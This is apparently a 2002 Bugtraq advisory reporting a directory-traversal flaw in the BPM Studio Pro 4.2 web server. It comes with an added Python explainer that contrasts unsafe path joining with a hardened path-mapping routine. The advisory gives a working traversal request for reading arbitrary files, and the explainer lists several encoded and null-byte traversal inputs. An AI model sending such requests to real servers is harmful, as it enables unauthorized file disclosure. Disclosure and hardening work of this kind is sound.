BPM STUDIO PRO 4.2 DIRECTORY ESCAPE VULNERABILITY

From: ][-][UNTER (lopht@tutopia.com)
Date: 02/27/02


From: "][-][UNTER" <lopht@tutopia.com>
To: <bugtraq@securityfocus.com>
Date: Wed, 27 Feb 2002 07:02:34 -0300

Hi bugtraq again...

Now I've found another vulnerability in the BPM STUDIO PRO 4.2 HTTP server
implementation.

Anyone can download any file on a host running this software simply by
performing this HTTP request:

 http://BPM-HOST/../../../../autoexec.bat

The HTTP server is not activated by default...

byes

-----------------------------------------------
             ][-][UNTER
Infobyte Security Research Crew
      Buenos Aires, Argentina
-----------------------------------------------
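The request above works because the server joins the URL path onto its document root without normalising it, so each `..` segment walks one directory up and out of the root. As an added example (not code from the advisory, from BPM Studio, or from the poster), the naive join that produces that behaviour is shown next to a hardened mapping routine that decodes, normalises and refuses any path that would leave the root. The document root `/srv/www` and the request paths in the demo are constructed for illustration.

```python
"""Mapping an HTTP request path onto a document root without letting it escape.

Added example; not part of the original advisory or of BPM Studio.
The document root and request paths used below are constructed.
"""
import posixpath
from typing import Optional


def naive_map(doc_root: str, request_path: str) -> str:
    """The pattern the advisory describes: the URL path is glued onto the
    document root with no normalisation, so '..' segments climb out of it."""
    return doc_root.rstrip("/") + "/" + request_path.lstrip("/")


def safe_map(doc_root: str, request_path: str) -> Optional[str]:
    """Map request_path under doc_root, or return None if it would escape.

    1. Percent-decode once, so '%2e%2e' is recognised as '..'.
    2. Treat backslashes as separators (Windows hosts accept both).
    3. Reject embedded NUL bytes, which truncate paths in C runtimes.
    4. Collapse '.' and '..' with posixpath.normpath and refuse a result
       that still begins with '..', i.e. one that climbs above the root.
    """
    from urllib.parse import unquote

    decoded = unquote(request_path).replace("\\", "/")
    if "\x00" in decoded:
        return None
    rel = posixpath.normpath(decoded.lstrip("/"))
    if rel == ".." or rel.startswith("../"):
        return None
    if rel == ".":          # request for the root itself
        rel = ""
    candidate = posixpath.join(doc_root, rel)
    # Belt and braces: the final path must share the root as a prefix.
    if posixpath.commonpath([doc_root, candidate]) != posixpath.normpath(doc_root):
        return None
    return candidate


if __name__ == "__main__":
    root = "/srv/www"
    # Constructed sample requests: two benign, the rest traversal attempts.
    for req in ["/music/list.htm", "/music/../index.html",
                "/../../../../autoexec.bat", "/%2e%2e/%2e%2e/autoexec.bat",
                "/..\\..\\autoexec.bat", "/index.html%00.jpg"]:
        print(f"{req:35} naive={naive_map(root, req):45} safe={safe_map(root, req)}")
```

The check is deliberately done on the decoded, normalised string rather than by calling `os.path.exists` first; a server that only tests existence still leaks every file the process can read. On a live server, resolve the final path with `os.path.realpath` as well so that a symlink inside the root cannot point outside it.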
